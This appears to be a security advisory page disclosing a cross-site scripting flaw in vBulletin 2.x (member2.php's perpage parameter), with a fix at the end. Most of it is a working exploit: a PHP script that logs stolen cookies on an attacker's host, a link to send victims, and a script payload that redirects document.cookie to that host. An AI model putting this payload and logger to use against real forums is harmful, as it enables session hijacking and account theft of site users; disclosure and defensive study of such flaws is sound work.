vBulletin XSS Injection Vulnerability

2007.10.15
Credit: Sp.IC
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2002-2235
CWE: CWE-79


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

.:: vBulletin XSS Injection Vulnerability vBulletin is a powerful and widely used bulletin board system, based on PHP language and MySQL database. I discovered lately a Cross-Site Scripting issue that would allow attackers to inject maleficent codes into the pages and execute it on the clients browser. + Vulnerable Versions: - Jelsoft vBulletin 2.2.9 Candidate. - Jelsoft vBulletin 2.2.8. - Jelsoft vBulletin 2.2.7. - Jelsoft vBulletin 2.2.6. - Jelsoft vBulletin 2.2.5. - Jelsoft vBulletin 2.2.4. - Jelsoft vBulletin 2.2.3. - Jelsoft vBulletin 2.2.2. - Jelsoft vBulletin 2.2.1. - Jelsoft vBulletin 2.2.0. - Jelsoft vBulletin 2.0.2. - Jelsoft vBulletin 2.0.1. - Jelsoft vBulletin 2.0.0. + Details: At "Start View Threads" block in member2.php, there is a variable [$perpage] controls the way of reciting subscribed threads, therefore an integer value [Which refers to the number of threads that will be displayed each page] should be assigned for the variable. However, we should realise that the value of this variable is added to a query that will fetch records from the database, so if a client gave a wrong value to $perpage, the script will output an error message [Due to script doesn't checks on inputs and filter it], printing the query and revealing its mistake. + Exploit: - Run this script on some host: <?PHP // vBulletin XSS Injection Vulnerability: Exploit // --- // Coded By : Sp.IC (SpeedICNet (at) Hotmail (dot) Com [email concealed]). // Descrption: Fetching vBulletin's cookies and storing it into a log file. // Variables: $LogFile = "Cookies.Log"; // Functions: /* If ($HTTP_GET_VARS['Action'] = "Log") { $Header = "<!--"; $Footer = "--->"; } Else { $Header = ""; $Footer = ""; } Print ($Header); */ Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>"); Print ("<Pre>"); Print ("<Center>"); Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n"); Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet (at) Hotmail (dot) Com [email concealed]\">Sp.IC</A></B><Hr Width=\"20%\">"); /* Print ($Footer); */ Switch ($HTTP_GET_VARS['Action']) { Case "Log": $Data = $HTTP_GET_VARS['Cookie']; $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL)))))); $Log = FOpen ($LogFile, "a+"); FWrite ($Log, Trim ($Data) . "\n"); FClose ($Log); Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">"); Break; Case "List": If (!File_Exists ($LogFile) || !In_Array ($Records)) { Print ("<Br><Br><B>There are No Records</B></Center></Pre>"); Exit (); } Else { Print ("</Center></Pre>"); $Records = Array_UniQue (File ($LogFile)); Print ("<Pre>"); Print ("<B>.:: Statics</B>\n"); Print ("\n"); Print ("? Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n"); Print ("? Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n"); Print ("\n"); Print ("<B>.:: Options</B>\n"); Print ("\n"); If (Count (File ($LogFile)) > 0) { $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]"; } Else{ $Link['Download'] = "[No Records in Log]"; } Print ("? Download Log : " . $Link ['Download'] . "\n"); Print ("? Clear Records : [<A Href=\"" . $SCRIPT_PATH . "?Action=Delete\">Y</A>]\n"); Print ("\n"); Print ("<B>.:: Records</B>\n"); Print ("\n"); While (List ($Line[0], $Line[1]) = Each ($Records)) { Print ("<B>" . $Line[0] . ": </B>" . $Line[1]); } } Print ("</Pre>"); Break; Case "Delete": @UnLink ($LogFile); Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>"); Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">"); Break; } ?> - Give a victim this link: member2.php?s=[Session] &action=viewsubscription&perpage=[Script Code] - Note: You can replace [Script Code] with: -- ><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+ (document.cookie);</Script> - Then go to Http://[Exploit Path]?Action=List + Solution: - Under [ // set defaults ] on line 304, paste this code: If (IsSet ($perpage) && $perpage != Is_Int($perpage)) { $perpage = IntVal ($perpage); } + Links: - Http://www.vBulletin.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top